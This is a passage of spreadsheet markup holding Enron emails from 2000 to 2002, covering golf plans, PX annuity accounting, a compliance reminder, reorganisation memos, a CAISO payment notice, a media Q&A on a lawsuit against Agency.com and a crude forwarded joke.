&gt; &gt;&gt;&gt; wolphguy@aol.com; jramirez@othon.com; MarkM@cajunusa.com;_x000D_
&gt; &gt;&gt;&gt; ras1119@hotmail.com; klyn@pdq.net_x000D_
&gt; &gt;&gt;&gt; Subject: seeing as mark won't answer my e-mails...._x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt; is anyone up for some golf this weekend?_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt; ricardo_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; _________________________________________________________________x000D_
&gt; &gt;&gt;&gt; Sent via the EV1 webmail system at mail.ev1.net_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_________________________________________________________________x000D_
&gt; &gt;Sent via the EV1 webmail system at mail.ev1.net_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; _________________________________________________________________x000D_
&gt; Sent via the EV1 webmail system at mail.ev1.net_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 11:07:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: West Deals</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Tracy. Based on conversations I just had with Chris Foster it looks like they want to take the money and put it in a sch C. To cut a long story short, they are worried that they will lose part or all of this money because the FERC and California may be revising the PX index. I have indicated that this can not be done until John Lavorato signs off on this. Stacey, do you see any fall out from doing this. It looks like they want to take care of this in the next couple of days._x000D_
 _x000D_
John_x000D_
_x000D_
-----Original Message-----_x000D_
From: Greene, Tracy _x000D_
Sent: Friday, October 19, 2001 11:03 AM_x000D_
To: Postlethwaite, John_x000D_
Subject: RE: West Deals_x000D_
_x000D_
_x000D_
John,_x000D_
 _x000D_
I'm afraid I don't have a whole lot of detail.   These deals originally came through on the March Flash to Actual report as a West DPR adjustment.   I was then told by Stacey that these deals needed to be moved off DPR adjusment, but I'm not sure where they were to be moved to.   You will see these listed as a "?" on the LTD report at the top of the page.  I know during the meeting, Stacey was talking to Portland about these, but the only notes that I see on my hard copy is "wait 60 days on PX"..."annuity 4 sale back to them"._x000D_
 _x000D_
Sorry I'm not much more help than that._x000D_
 _x000D_
Let me know if you have any questions._x000D_
 _x000D_
Thanks_x000D_
Tracy_x000D_
 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Postlethwaite, John _x000D_
Sent: Friday, October 19, 2001 11:24 AM_x000D_
To: Greene, Tracy_x000D_
Subject: FW: West Deals_x000D_
_x000D_
_x000D_
Can you give me some background info on these deals below. _x000D_
 _x000D_
John_x000D_
-----Original Message-----_x000D_
From: Postlethwaite, John _x000D_
Sent: Monday, October 15, 2001 8:51 AM_x000D_
To: Confer, Mark; O'Neil, Murray P._x000D_
Subject: FW: West Deals_x000D_
_x000D_
_x000D_
Can both of you give me some background on the 4 annuity deals listed below. Mark, these deals have never shown up on a desk analysis report and were entered on Mar 30 for jan business. Are they supposed to? Murray, are we supposed to be taking these annuities as PMA adjustments or are we still waiting for something more information?_x000D_
 _x000D_
 _x000D_
Thanks for your help on this._x000D_
 _x000D_
John_x000D_
 _x000D_
503-464-7756_x000D_
-----Original Message-----_x000D_
From: White, Stacey W. _x000D_
Sent: Wednesday, October 10, 2001 2:57 PM_x000D_
To: Postlethwaite, John_x000D_
Subject: FW: West Deals_x000D_
_x000D_
_x000D_
Can you check into this?_x000D_
_x000D_
-----Original Message----- _x000D_
From: Greene, Tracy _x000D_
Sent: Tue 10/9/2001 1:44 PM _x000D_
To: White, Stacey W. _x000D_
Cc: _x000D_
Subject: West Deals _x000D_
_x000D_
_x000D_
Stacey_x000D_
 _x000D_
Do you remember what was going to happen to these deals with the cap of 150.00? Will they be clearing anytime soon? _x000D_
 _x000D_
Thanks_x000D_
Tracy_x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
Mar-01	 ?	  	 AC	  	 Jan-01	 ATLANTICRICH	 566307.1 - Annuity entered to reflect CALPX Settlement of Index (Cap - $150.00) - per Murray O'Neill	  	  	  	 (1,383,042)	_x000D_
Mar-01	 ?	  	 AC	  	 Jan-01	 DELANOENECOM	 566310.1 - Annuity entered to reflect CALPX Settlement of Index (Cap - $150.00) - per Murray O'Neill	  	  	  	 (1,885,594)	_x000D_
Mar-01	 ?	  	 AC	  	 Jan-01	 TOSCORFNGCO	 566313.1 - Annuity entered to reflect CALPX Settlement of Index (Cap - $150.00) - per Murray O'Neill	  	  	  	 (1,539,749)	_x000D_
Feb-01	 FO	  	  	  	  	  	 Canada accrual entries ?	  	  	 0 	0 	_x000D_
Jan-01	 FO	  	  	  	  	  	 Nymex liquidations - no settlements - need support for Valarie	  	 (156,552)	  	  	_x000D_
Mar-01	 ?	  	 AC	  	 Jan-01	 WHEELABRMAR	 566337.1 - Annuity entered to reflect CALPX Settlement of Index (Cap - $150.00) - per Murray O'Neill	  	  	  	 (709,905)	_x000D_
Tracy Greene_x000D_
Enron North America_x000D_
713-853-0583_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2000 01:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Continental Airlines, Inc.</t>
  </si>
  <si>
    <t>Thanks for your help._x000D_
_x000D_
-Dan</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'diana.scholtes@enron.com', 'chris.foster@enron.com', 'matt.motley@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'sean.crandall@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', "murray.o'neil@enron.com", 'greg.wolfe@enron.com', 'jeff.richter@enron.com', 'debra.davidson@enron.com', 'robert.badeer@enron.com', 'john.forney@enron.com'})</t>
  </si>
  <si>
    <t>I will be traveling to Calgary on Tuesday and Wednesday.  You can reach me on _x000D_
my cell phone -- 503-701-5181.  I will be back in town Wednesday night and _x000D_
will be in the office Thursday morning.</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 10:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Anonymous Reporting Facilities</t>
  </si>
  <si>
    <t xml:space="preserve"> This is to remind you that various anonymous reporting facilities are=20_x000D_
available for you to report violations of Company policy and suspected=20_x000D_
criminal conduct by any officer, employee, or agent of the Company relating=_x000D_
=20_x000D_
to the performance of his or her duties.  These reporting facilities are al=_x000D_
so=20_x000D_
available for your questions, messages, comments, and suggestions._x000D_
_x000D_
 Any policy violation or criminal conduct may be reported by letter, E-mail=_x000D_
,=20_x000D_
or voice mail, as set forth below, describing the suspected violation or=20_x000D_
criminal conduct with as much detail as possible to allow the Company to=20_x000D_
conduct an investigation of the reported matter._x000D_
_x000D_
1. Letters should be sent to the Confidential Post Office Box: =20_x000D_
_x000D_
Enron Compliance Officer_x000D_
Confidential - Conduct of Business Affairs=20_x000D_
P. O. Box 1188=20_x000D_
Houston, Texas  77251-1188_x000D_
_x000D_
2. E-mails should be sent to the Office of the Chairman=01,s E-mail box: =_x000D_
=20_x000D_
Employees with Enron E-mail can access this box by sending an E-mail to the=_x000D_
=20_x000D_
Office of the Chairman.  Simply type =01&amp;Office of the Chairman=018 in the =_x000D_
address=20_x000D_
box, type your message, and send.  Your message will be completely=20_x000D_
anonymous.  If, however, you copy your message and E-mail it to someone els=_x000D_
e,=20_x000D_
the copy will not be anonymous. =20_x000D_
_x000D_
3. Voice mail messages should be left with the Office of the Chairman=20_x000D_
PhoneMail Box.  You can access the Office of the Chairman PhoneMail Box by=_x000D_
=20_x000D_
calling (713) 853-7294.  If you call from your extension or an outside line=_x000D_
,=20_x000D_
your message will be completely anonymous.  If, however, you access the=20_x000D_
PhoneMail Box while you are in the PhoneMail system, your message will not =_x000D_
be=20_x000D_
anonymous._x000D_
_x000D_
 You may, but are not required to, identify yourself.  If you would like to=_x000D_
=20_x000D_
identify yourself, please submit your name and phone number with your lette=_x000D_
r=20_x000D_
or message.  All anonymously reported matters will be investigated and acte=_x000D_
d=20_x000D_
upon in the same manner as those that contain signatures._x000D_
_x000D_
 The Company takes great pride in ensuring that Enron is a great place to=_x000D_
=20_x000D_
work.  We encourage each employee to continue to conduct the business affai=_x000D_
rs=20_x000D_
of the Company in accordance with all applicable laws and in a moral and=20_x000D_
honest manner.</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'jeffery.fawcett@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>Gas Accord II Rule 51</t>
  </si>
  <si>
    <t>FYI.  For meeting with PG&amp;E (which is Tues., Oct. 31, from 10 am-Noon (PDT) _x000D_
in Enron's SF offices._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 10/24/2000 12:50 PM -----_x000D_
_x000D_
	"Bellenger, Geoffrey" &lt;GJB2@pge.com&gt;_x000D_
	10/23/2000 06:42 PM_x000D_
		 _x000D_
		 To: "'jdasovic@enron.com'" &lt;jdasovic@enron.com&gt;_x000D_
		 cc: "Williams, Ray" &lt;RDW0@pge.com&gt;, "Lindh, Frank (Law)" &lt;FRL3@pge.com&gt;_x000D_
		 Subject: Gas Accord II Rule 51_x000D_
_x000D_
_x000D_
Jeff_x000D_
_x000D_
Ray Williams relayed to me that you would like to sign the Rule 51 agreement_x000D_
so you can get our prior Workshop materials.  All you need to do is fill out_x000D_
the information form, initial (electronically) on the appropriate line, and_x000D_
e-mail back to me (gjb2@pge.com)._x000D_
 &lt;&lt;Gas Accord II Information Form.doc&gt;&gt;_x000D_
_x000D_
Here is a copy of Rule 51.  Nothing needed on this document.  It is only for_x000D_
your reference._x000D_
 &lt;&lt;CPUC Rule 51.doc&gt;&gt;_x000D_
Call if you have questions._x000D_
 Geoff_x000D_
 415-973-8415_x000D_
_x000D_
 - Gas Accord II Information Form.doc_x000D_
 - CPUC Rule 51.doc</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 13:31:28 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Seminars, Forums, Conferences Sub Group</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	SloanConsulting@aol.com@ENRON  _x000D_
Sent:	Tuesday, November 20, 2001 9:01 AM_x000D_
To:	vkamins@enron.com; mfkeeth@shellus.com; gerald.w.mcelvy@exxonmobil.com; dph@swbell.net; Bob.Peebler@halliburton.com; tina.sivinski@eds.com; TNTipton@marathonoil.com; bwillia6@us.ibm.com_x000D_
Cc:	bobcasey@uh.edu; pkumar@uh.edu_x000D_
Subject:	Seminars, Forums, Conferences Sub Group_x000D_
_x000D_
Please find attached an input form to begin the dialogue for our sub group._x000D_
To be ready for our next Energy Committee meeting in January, I would suggest_x000D_
that everyone try to respond by December 15th.  Please copy all the members_x000D_
of the sub group on any response.  Feel free to comment back and forth on_x000D_
each others responses.  Thanks so much for your participation._x000D_
Lane</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 10:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>In support of Enron=01,s continuing efforts to increase its return on inves=_x000D_
ted=20_x000D_
capital and direct resources towards our highest return businesses, David=_x000D_
=20_x000D_
Haug, Chairman and CEO of Enron CALME, Jim Hughes, President and COO of Enr=_x000D_
on=20_x000D_
APACHI, Joe Kishkill, Managing Director of Enron South America, and Frank=_x000D_
=20_x000D_
Stabler, formerly a Managing Director of Enron CALME, will join Mark Metts =_x000D_
in=20_x000D_
a corporate wide effort, to help monetize some of Enron=01,s assets.  David=_x000D_
 will=20_x000D_
help transition the CALME business activities into other parts of Enron whi=_x000D_
le=20_x000D_
working with Mark on the asset monetization projects.  David will continue =_x000D_
as=20_x000D_
an Executive Vice President for Enron Corp and a member of Enron=01,s Execu=_x000D_
tive=20_x000D_
Committee.  Cliff Baxter will oversee this effort._x000D_
_x000D_
Consistent with these changes, the CALME group will be divided as follows. =_x000D_
=20_x000D_
Enron Global LNG and Enron=01,s Caribbean Basin activities will become part=_x000D_
 of=20_x000D_
the new Enron Global Markets (EGM) group headed by Mike McConnell.  Rick=20_x000D_
Bergsieker, President/COO of LNG will continue in that role and in his dual=_x000D_
=20_x000D_
role as President/COO of Enron Middle East, which will also join EGM. Shawn=_x000D_
=20_x000D_
Cumberland, President and COO of the Caribbean Basin unit and his executive=_x000D_
=20_x000D_
team will carry out the transition process for the Caribbean business unit'=_x000D_
s=20_x000D_
people and businesses as part of EGM.  Management of its Colombia and=20_x000D_
Venezuela businesses will transfer to Enron South America and its LNG-relat=_x000D_
ed=20_x000D_
activities to EGM as described above.=20_x000D_
_x000D_
The EES related initiatives and people will be transferred to those units. =_x000D_
=20_x000D_
All of the various international businesses will participate as usual in th=_x000D_
e=20_x000D_
upcoming budget process with their new alignment and continue to meet their=_x000D_
=20_x000D_
plan targets for 3rd and 4th quarters._x000D_
_x000D_
Concurrently, we are consolidating our trading and merchant activities in=_x000D_
=20_x000D_
Japan and Australia into Enron Europe.  Joe Hirl and Paul Quilkey will repo=_x000D_
rt=20_x000D_
to Enron Europe=01,s Office of the Chairman._x000D_
_x000D_
We congratulate David Haug and Rebecca McDonald for proposing these=20_x000D_
realignments, which we agree, will maximize both the financial and=20_x000D_
intellectual capital in Enron.  Over the coming weeks, specific assignments=_x000D_
=20_x000D_
and reporting relationships will be determined and communicated.</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 15:14:47 -0800 (PST)</t>
  </si>
  <si>
    <t>Employee Meeting Postponed</t>
  </si>
  <si>
    <t>We know you have questions about recent events impacting Enron and our plans for the future.  Ongoing investigations and pending litigation have made it difficult, if not impossible, to share information in a timely manner.  While we can't address certain issues, we can tell you about our initial plans to move Enron forward and emerge from bankruptcy, and we are eager to do that._x000D_
_x000D_
We had planned to hold an all-employee meeting tomorrow, January 23, at the Hyatt Regency.  However, we don't want to subject you to the media frenzy that would certainly surround such a meeting, so we've decided to postpone it.  We are currently making arrangements to hold a series of employee meetings within the building to protect your privacy.  We will provide the date and times to you as soon as the logistics for those meetings are finalized._x000D_
_x000D_
Prior to the employee meetings, we will provide an overview of Enron's new organizational structure.  You can expect that memo shortly.</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 06:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.hain@enron.com', 'richard.sanders@enron.com', 'christian.yoder@enron.com', 'gfergus@brobeck.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>CAISO Notice - Letter from PG&amp;E Regarding Payment for November, 2_x000D_
	000 Invoice</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
---------------------- Forwarded by Steve C Hall/PDX/ECT on 02/01/2001 02:55 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Woertz, Byron" &lt;BWoertz@caiso.com&gt; on 02/01/2001 02:18:53 PM_x000D_
To: ISO Market Participants _x000D_
&lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PARTI_x000D_
CIPANTS@caiso.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: CAISO Notice - Letter from PG&amp;E Regarding Payment for November, 2 _x000D_
000 Invoice_x000D_
_x000D_
_x000D_
  ISO Market Participants:_x000D_
  On January 31, 2001, the CEO of the California ISO received_x000D_
by fax a letter from Joseph C. Henri, Director of Utility Electric Portfolio_x000D_
Management at Pacific Gas and Electric Co. (PG&amp;E). Mr. Henri stated that_x000D_
PG&amp;E was providing notice pursuant to Sections 15.1 and 15.2 of the ISO_x000D_
Tariff that "Uncontrollable Forces prevent PG&amp;E from performing all of its_x000D_
obligations under the ISO Tariff."  Mr. Henri's letter identified_x000D_
"government regulations and market conditions" as "forces beyond PG&amp;E's_x000D_
reasonable control."  In addition, Mr. Henri stated that the temporary_x000D_
electric rate increase ordered by the California Public Utilities Commission_x000D_
on January 4, 2001 was "an amount far below that necessary to enable PG&amp;E to_x000D_
generate sufficient cash to pay its ongoing procurement bills."_x000D_
  Mr. Henri continued by stating that "PG&amp;E...lacks the funds_x000D_
to pay in full its bill from the Independent System Operator for November_x000D_
power purchases, due on February 1, 2001."   Further, Mr. Henri stated that_x000D_
"because PG&amp;E's inability to make full payment is due to Uncontrollable_x000D_
Forces, the ISO Tariff precludes the Independent Service (sic.) Operator_x000D_
from imposing any sanctions against PG&amp;E."_x000D_
  Mr. Henri concluded by stating that PG&amp;E's efforts to secure_x000D_
relief from these circumstances continue and that PG&amp;E will inform the ISO_x000D_
as soon as it is able to resume making full payment for its wholesale power_x000D_
purchases._x000D_
  At present, the California ISO neither accepts nor rejects_x000D_
the claims made in Mr. Henri's letter. The purpose of this market notice is_x000D_
to fully inform Market Participants who may have claims directly against_x000D_
PG&amp;E based on PG&amp;E's failure to pay in full ISO invoices._x000D_
_x000D_
  Byron Woertz_x000D_
  Director, Client Relations_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 08:55:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>tickets for Thursday</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Ercot hourly will need four tickets for thursday's game._x000D_
_x000D_
The attendees:_x000D_
_x000D_
Eric Saibi_x000D_
Alex McElreath_x000D_
Myself_x000D_
Steve Olinde_x000D_
_x000D_
_x000D_
Thanks,_x000D_
JMF</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: RESUME - Gloria Smith</t>
  </si>
  <si>
    <t>No interest.</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brbarkovich@earthlink.net'})</t>
  </si>
  <si>
    <t>Re: REVISED Merged Leg Document</t>
  </si>
  <si>
    <t>I do not agree with Jeff's changes to Dorothy's language and I am not sure if _x000D_
Dorothy does._x000D_
In particular, I don't know what is meant by the language in the definition _x000D_
of Spot Market_x000D_
Service which says "and shall include all costs incurred by the electrical _x000D_
corporation to_x000D_
provide retail electric service" which seems to me to go way beyond even _x000D_
energy service.  I_x000D_
am also concerned that there be no way that customers have to pay for A/S _x000D_
twice._x000D_
_x000D_
Second, I think 30 days is too short a time for a customer on Spot Market _x000D_
service to elect_x000D_
DA or Term Service, since if the UDC is providing Term Service on a best _x000D_
efforts basis, that_x000D_
option might not even be available within 30 days.  Barbara_x000D_
_x000D_
Delaney Hunter wrote:_x000D_
_x000D_
&gt; Folks-_x000D_
&gt; Sorry for the delay --- major computer problems over here. I have used Ann's_x000D_
&gt; document and added the changes I made as a template. It is in redline and_x000D_
&gt; the questions are highlighted as well. Please look over it carefully and if_x000D_
&gt; there is language you are going to provide please do it post haste._x000D_
&gt;_x000D_
&gt; WE WILL NOT HAVE A 2:00 CALL --- I think most folks are just too damn busy._x000D_
&gt; So, if there is a question, problem, disagreement, etc on language please_x000D_
&gt; work it out amongst yourselves and send me new language if applicable._x000D_
&gt; Remember this is due to Rick BY 5:00 PM TODAY!!!!!_x000D_
&gt;_x000D_
&gt; Call me with questions,_x000D_
&gt; Delaney_x000D_
&gt;_x000D_
&gt;   ------------------------------------------------------------------------_x000D_
&gt;                                       Name: REVISED Merged Leg Language.doc_x000D_
&gt;    REVISED Merged Leg Language.doc    Type: Microsoft Word Document _x000D_
(application/msword)_x000D_
&gt;                                   Encoding: base64</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 07:02:52 -0800 (PST)</t>
  </si>
  <si>
    <t>IntercontinentalExchange System is Available</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The ICE trading system is now available._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                        </t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 02:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FAQ's regarding Agency.</t>
  </si>
  <si>
    <t xml:space="preserve">Richard - do we have a policy regarding questions concerning pending _x000D_
litigation?  How should we handle these?_x000D_
_x000D_
Mark_x000D_
---------------------- Forwarded by Mark Taylor/HOU/ECT on 02/24/2000 10:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
David Forster_x000D_
02/23/2000 07:08 PM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc: Louise Kitchen/LON/ECT@ECT _x000D_
Subject: FAQ's regarding Agency._x000D_
_x000D_
Mark,_x000D_
_x000D_
I would appreciate your comments on the following FAQ's, intended to be a _x000D_
guide for Louise/myself/PR in the event we take a media call regarding the _x000D_
injunction/lawsuit. Also, if you have any ideas to expand the list, please _x000D_
let me know._x000D_
_x000D_
_x000D_
Any calls received from the media will be answered by Louise, or in Louise' _x000D_
absence, by myself, with PR in the room (Louise will be back in the office on _x000D_
Monday and I suspect it is very unlikely that we would receive any calls _x000D_
before then)._x000D_
_x000D_
Q1 Did Agency.com develop EnronOnline?_x000D_
A Agency.com was hired to provide development support for some elements of _x000D_
EnronOnline. Other elements were designed and built by Enron staff._x000D_
_x000D_
Q2 Which elements did Agency.com develop?_x000D_
A We are not currently releasing details regarding the specific elements _x000D_
which Agency was involved in developing._x000D_
_x000D_
Q3 What parts of the system did Enron develop?_x000D_
A We are not currently releasing details regarding the specific elements _x000D_
which Enron developed._x000D_
_x000D_
Q4 Why have you filed an injunction against Agency?_x000D_
A We believe that Agency has been releasing confidential information without _x000D_
authorisation from Enron._x000D_
_x000D_
Q5 What is the amount of your lawsuit?_x000D_
A We are not releasing that information at this time._x000D_
_x000D_
Q6 Do you believe that the release of this information by Agency has damaged _x000D_
the competitive lead of EnronOnline?_x000D_
A We believe that Agency has released information in contravention of the _x000D_
terms of their contract with us. Whether or not this release of information _x000D_
is damaging to EnronOnline is a matter which has yet to be determined._x000D_
_x000D_
Q7 Does this experience make you want to avoid working with outside agencies?_x000D_
A We believe that outside agencies are a valuable source of expertise which _x000D_
can complement the Enron's strong IT skillset. We don't believe that the _x000D_
actions of one company in any way tarnishes the ability of other, very _x000D_
capable IT consultancy companies._x000D_
_x000D_
Q8 Are you happy with the product which Agency.com provided?_x000D_
A We are very pleased with the final product represented by EnronOnline, but _x000D_
are not in a position to comment on the strength of any of the individual _x000D_
contributors._x000D_
_x000D_
Q9 Prior to this lawsuit, would you have recommended Agency.com to other _x000D_
companies looking to build something like EnronOnline?_x000D_
A No. We would not have recommended for or against the use of Agency.com._x000D_
_x000D_
Q10 You must be quite angry that a consultant has splashed your information _x000D_
into a public forum._x000D_
A We are disappointed that the confidentiality between ourselves and our _x000D_
contractor does not seem to have been upheld._x000D_
_x000D_
Q11 What do you hope to gain from this lawsuit/injunction?_x000D_
A We hope to prevent the further release of confidential information._x000D_
_x000D_
Q12  If all you want to do is prevent the release of information, why are you _x000D_
also filing a lawsuit?_x000D_
A The lawsuit is required at this time to enable the injunction. If it is _x000D_
found that damages have been caused as a result of the information which has _x000D_
already been released, then compensation may also be appropriate._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 02:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'candace.womack@enron.com'})</t>
  </si>
  <si>
    <t>Re: Special Background letter</t>
  </si>
  <si>
    <t xml:space="preserve">Candace, You are right -- there is no need to send a second letter since we _x000D_
didn't base our decision on the background check results.  Michelle_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
---------------------------_x000D_
_x000D_
Michelle Cash_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3823_x000D_
Houston, Texas  77002_x000D_
(713) 853-6401_x000D_
michelle.cash@enron.com_x000D_
_x000D_
This message may contain confidential information that is protected by the _x000D_
attorney-client and/or work product privileges._x000D_
_x000D_
_x000D_
_x000D_
	Candace Womack_x000D_
	12/12/2000 07:07 PM_x000D_
		_x000D_
		 To: Michelle Cash/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Special Background letter_x000D_
_x000D_
Michelle - Just wanted to verify that there is no need to send this candidate _x000D_
a second notice.  It seems a bit pointless, but thought I would double check _x000D_
with you.  Please advise._x000D_
_x000D_
Thanks._x000D_
_x000D_
Candace_x000D_
_x000D_
_x000D_
_x000D_
Michelle Cash_x000D_
11/18/2000 04:24 PM_x000D_
To: Candace Womack/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Special Background letter  _x000D_
_x000D_
Candace, this letter looks good.  Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Candace Womack_x000D_
11/14/2000 11:22 AM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Special Background letter_x000D_
_x000D_
Michelle - _x000D_
_x000D_
I have drafted up a special letter to send to the candidate with the _x000D_
derogatory results on his background investigation report.  We had decided _x000D_
not to engage him for business reasons unrelated to the background report _x000D_
(his job requisition was actually cancelled), and you suggested that we send _x000D_
him a copy of his report anyway._x000D_
_x000D_
Could you look over this letter and let me know if it is suitable to send _x000D_
out?  Will we need to also modify the second letter (that contains contact _x000D_
information for the investigation agency) and send it out in a couple of _x000D_
weeks, or will this one letter be sufficient?  Or should I incorporate the _x000D_
contact information into this letter?_x000D_
_x000D_
Thanks for your assistance._x000D_
_x000D_
Candace_x000D_
x30651_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aldo_portales@fpl.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Aldo:_x000D_
Here is a draft presentation of the trading, risk management and backoffice.  _x000D_
Please give me a call if you have any questions.  Thanks!_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:28:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edo711@hotmail.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: Drankin</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
&gt;From: "Ordonez, Edwin" &lt;Edwin.Ordonez@us.cibc.com&gt;_x000D_
&gt;To: "'edo711@hotmail.com'" &lt;edo711@hotmail.com&gt;_x000D_
&gt;Subject: FW: Drankin_x000D_
&gt;Date: Wed, 30 Jan 2002 12:19:53 -0500_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Murphy, Dan_x000D_
&gt;Sent: Wednesday, January 30, 2002 11:46 AM_x000D_
&gt;To: Joyce, Michael; Hogarth, Josh; Ordonez, Edwin; O'Mara, Robert_x000D_
&gt;Subject: Drankin_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;  Two buddies, Ralph and Rob, are getting very drunk at a bar when_x000D_
&gt; &gt;  suddenly_x000D_
&gt; &gt;  Rob throws up all over himself. "Oh, no. Now Jane will kill me!"_x000D_
&gt; &gt;_x000D_
&gt; &gt;  Ralph says, "Don't worry, pal. Just tuck a twenty in your breast_x000D_
&gt; &gt; pocket,_x000D_
&gt; &gt;  tell Jane that someone threw up on you and gave you twenty dollars for_x000D_
&gt; &gt;  the_x000D_
&gt; &gt;  dry cleaning bill."_x000D_
&gt; &gt;_x000D_
&gt; &gt;  So they stay for another couple of hours and get even drunker._x000D_
&gt; &gt;  Eventually_x000D_
&gt; &gt;  Rob rolls into home and his wife Jane starts to give him a_x000D_
&gt; &gt;  bad time. "You reek of alcohol and you've puked all over yourself! My_x000D_
&gt; &gt;  God,_x000D_
&gt; &gt;  you're disgusting!"_x000D_
&gt; &gt;_x000D_
&gt; &gt;  Speaking very carefully so as not to slur, Rob says, "Now wain aminit,_x000D_
&gt; &gt; I_x000D_
&gt; &gt;  can e'splain everything! Itsh not what you think. I only had a couple_x000D_
&gt; &gt;  drinks. But this other guy got sick on me ... he'd had one too many_x000D_
&gt; &gt; and_x000D_
&gt; &gt;  he_x000D_
&gt; &gt;  just couldn't hold his liquor. He said he was very sorry an' gave me_x000D_
&gt; &gt;  twenty_x000D_
&gt; &gt;  bucks for the cleaning bill!"_x000D_
&gt; &gt;_x000D_
&gt; &gt;  Jane looks in the breast pocket and says, "But this is forty bucks."_x000D_
&gt; &gt;_x000D_
&gt; &gt;  Oh, yeah...I almos' forgot, he shit in my pants, too."_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Chat with friends online, try MSN Messenger: http://messenger.msn.com</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 01:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Staff Meeting Reminder</t>
  </si>
  <si>
    <t>What location?_x000D_
_x000D_
